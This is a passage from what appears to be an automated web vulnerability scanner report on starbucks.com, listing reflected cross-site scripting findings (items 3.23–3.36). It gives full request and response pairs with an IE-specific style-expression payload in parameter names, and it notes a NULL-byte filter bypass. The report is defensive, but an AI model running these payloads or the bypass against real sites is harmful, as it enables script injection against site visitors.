GET /coffee/whole-bean-coffee/asia-pacific?5d4f5"style%3d"x%3aexpression(alert(1))"07322c9d36a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:23 GMT
Connection: close
Content-Length: 40730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?5d4f5"style="x:expression(alert(1))"07322c9d36a=1"/>
...[SNIP]...

3.23. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc378"style="x:expression(alert(1))"dc2a561ad6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style%3d"x%3aexpression(alert(1))"dc2a561ad6f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:32:57 GMT
Connection: close
Content-Length: 42564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?bc378"style="x:expression(alert(1))"dc2a561ad6f=1"/>
...[SNIP]...

3.24. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed27"style="x:expression(alert(1))"54fc7b2d713 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?9ed27"style%3d"x%3aexpression(alert(1))"54fc7b2d713=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:15 GMT
Connection: close
Content-Length: 44497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9ed27"style="x:expression(alert(1))"54fc7b2d713=1"/>
...[SNIP]...

3.25. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f92e"style="x:expression(alert(1))"69974f7cbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?2f92e"style%3d"x%3aexpression(alert(1))"69974f7cbb4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:29 GMT
Connection: close
Content-Length: 44773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?2f92e"style="x:expression(alert(1))"69974f7cbb4=1"/>
...[SNIP]...

3.26. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68bf7"style="x:expression(alert(1))"0236f70923d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style%3d"x%3aexpression(alert(1))"0236f70923d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:22 GMT
Connection: close
Content-Length: 41054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends/starbucks-christmas-blend?68bf7"style="x:expression(alert(1))"0236f70923d=1"/>
...[SNIP]...

3.27. http://www.starbucks.com/customer-service/faqs/coffee [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de96"style="x:expression(alert(1))"6b0cfc1dd14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /customer-service/faqs/coffee?8de96"style%3d"x%3aexpression(alert(1))"6b0cfc1dd14=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:45 GMT
Connection: close
Content-Length: 37419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/customer-service/faqs/coffee?8de96"style="x:expression(alert(1))"6b0cfc1dd14=1"/>
...[SNIP]...

3.28. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12942"style%3d"x%3aexpression(alert(1))"90f8a013063 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 12942"style="x:expression(alert(1))"90f8a013063 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu?12942"style%3d"x%3aexpression(alert(1))"90f8a013063=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:32 GMT
Content-Length: 72476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu?12942"style="x:expression(alert(1))"90f8a013063=1"/>
...[SNIP]...

3.29. http://www.starbucks.com/menu/drinks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50acb"style%3d"x%3aexpression(alert(1))"842d349c684 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 50acb"style="x:expression(alert(1))"842d349c684 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks?50acb"style%3d"x%3aexpression(alert(1))"842d349c684=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:14 GMT
Connection: close
Content-Length: 61971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks?50acb"style="x:expression(alert(1))"842d349c684=1"/>
...[SNIP]...

3.30. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f1532"style="x:expression(alert(1))"3f7f1489b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/frappuccino-blended-beverages?f1532"style%3d"x%3aexpression(alert(1))"3f7f1489b5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:12:51 GMT
Connection: close
Content-Length: 50806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages?f1532"style="x:expression(alert(1))"3f7f1489b5=1"/>
...[SNIP]...

3.31. http://www.starbucks.com/menu/food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c5cc1"style="x:expression(alert(1))"ffcdae7abe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food?c5cc1"style%3d"x%3aexpression(alert(1))"ffcdae7abe1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 56860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food?c5cc1"style="x:expression(alert(1))"ffcdae7abe1=1"/>
...[SNIP]...

3.32. http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/cranberry-bliss-bar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 78c8e"style="x:expression(alert(1))"9db2eb51a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/cranberry-bliss-bar?78c8e"style%3d"x%3aexpression(alert(1))"9db2eb51a72=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:47 GMT
Connection: close
Content-Length: 41261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/cranberry-bliss-bar?78c8e"style="x:expression(alert(1))"9db2eb51a72=1"/>
...[SNIP]...

3.33. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bff8"style="x:expression(alert(1))"2562d6e92e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition?2bff8"style%3d"x%3aexpression(alert(1))"2562d6e92e2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:19:06 GMT
Connection: close
Content-Length: 48718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition?2bff8"style="x:expression(alert(1))"2562d6e92e2=1"/>
...[SNIP]...

3.34. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1e9e"style="x:expression(alert(1))"6d79117ac61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /menu/nutrition/20-under-200?d1e9e"style%3d"x%3aexpression(alert(1))"6d79117ac61=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:19 GMT
Connection: close
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?d1e9e"style="x:expression(alert(1))"6d79117ac61=1"/>
...[SNIP]...

3.35. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/20-under-200

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5cccd"style="x:expression(alert(1))"1d36dcad9c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/nutrition/20-under-200?5cccd"style%3d"x%3aexpression(alert(1))"1d36dcad9c6=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:11 GMT
Content-Length: 38226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/nutrition/20-under-200?5cccd"style="x:expression(alert(1))"1d36dcad9c6=1"/>
...[SNIP]...

3.36. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition/35-under-350

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c6282"style="x:expression(alert(1))"6302ba5a92f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

